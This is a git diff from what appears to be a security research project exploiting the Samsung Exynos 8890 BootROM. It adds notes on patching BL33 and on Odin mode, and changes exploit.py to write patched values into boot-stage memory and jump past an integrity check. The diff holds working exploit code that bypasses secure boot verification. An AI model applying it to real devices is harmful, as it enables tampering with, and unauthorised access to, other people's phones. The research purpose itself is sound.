diff --git a/documentation/source/BootROM_8890/03_exploit_boot_chain.rst b/documentation/source/BootROM_8890/03_exploit_boot_chain.rst
index cccd9bc..d6e99d4 100644
--- a/documentation/source/BootROM_8890/03_exploit_boot_chain.rst
+++ b/documentation/source/BootROM_8890/03_exploit_boot_chain.rst
@@ -350,3 +350,11 @@ At this point, we tried patching something in memory at BL33 - like we did at BL
    Possible integrity check of boot stages at BL2 and BL33. 
 
 The decompilation is a bit broken, but we noticed that there are multiple calls to the same function, not just at the location where BL33 was returning from. With most specific things related to BL33 already done before this function. A similar verification seemed to have been done at ``0x02024e5c``. At this address, the same function was executed as at ``0x02024eec``, so instead of jumpingo into the function at ``0x02024eec``, we jumped into the function at ``0x02024e5c``. This worked, and allowed us to patch BL33, while continuing our boot flow. I assume, that we're doing an integrity check over BL2, while booting BL33. 
+
+If removing the ROM/UFS Short, the phone will go into odin mode. And is visible in lsusb after booting:
+
+.. code:: bash
+
+    Bus 001 Device 043: ID 04e8:685d Samsung Electronics Co., Ltd GT-I9100 Phone [Galaxy S II] (Download mode)
+
+
diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py
index 06c9f4e..2476d32 100644
--- a/source/exploit/exploit.py
+++ b/source/exploit/exploit.py
@@ -763,8 +763,8 @@ class ExynosDevice():
         VBAR_EL3 = self.cd.arch_dbg.state.VBAR_EL3
 
         self.test_write_execute(0x11207010)
+        # self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
         self.cd.restore_stack_and_jump(hijacked_fun)
-        time.sleep(2)
 
         # ==== Stage 4 BL2 ====
         bl2 = open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read()
@@ -799,17 +799,18 @@ class ExynosDevice():
         self.connect_device()
         self.usb_read(0x200) # GiAs
 
-        print(self.cd.arch_dbg.state.print_ctx())
-
         # # Modify something in BL33 
+        print(self.cd.arch_dbg.state.print_ctx())
         print(self.cd.memdump_region(0x8f063710, 0x8))
         self.cd.memwrite_region(0x8f063710, struct.pack('>I', 0x53614d74))
 
-        # Modify USB Recovyer mode string to something else
+        # Modify USB Recovyer mode string to: NFI Patched BL33
         self.cd.memwrite_region(0x8f06ab10, b'\x4e\x46\x49\x20\x50\x61\x74\x63\x68\x69\x6e\x67\x20\x42\x4c\x33\x33')
         print(self.cd.memdump_region(0x8f063710, 0x8))
 
-        # Do signature verification on BL2 instead of BL33 and proceed to boot (original is jump to 0x2024eec)
+        # Print state of x30/LR on screen
+        self.cd.memwrite_region(0x8f01dc08, struct.pack('>I', 0x7b432c91))
+
         self.cd.restore_stack_and_jump(0x02024e5c)
 
         pass
diff --git a/source/exploit/ttbr0_el3.pkl b/source/exploit/ttbr0_el3.pkl
index 5bd383f..1365d50 100644
Binary files a/source/exploit/ttbr0_el3.pkl and b/source/exploit/ttbr0_el3.pkl differ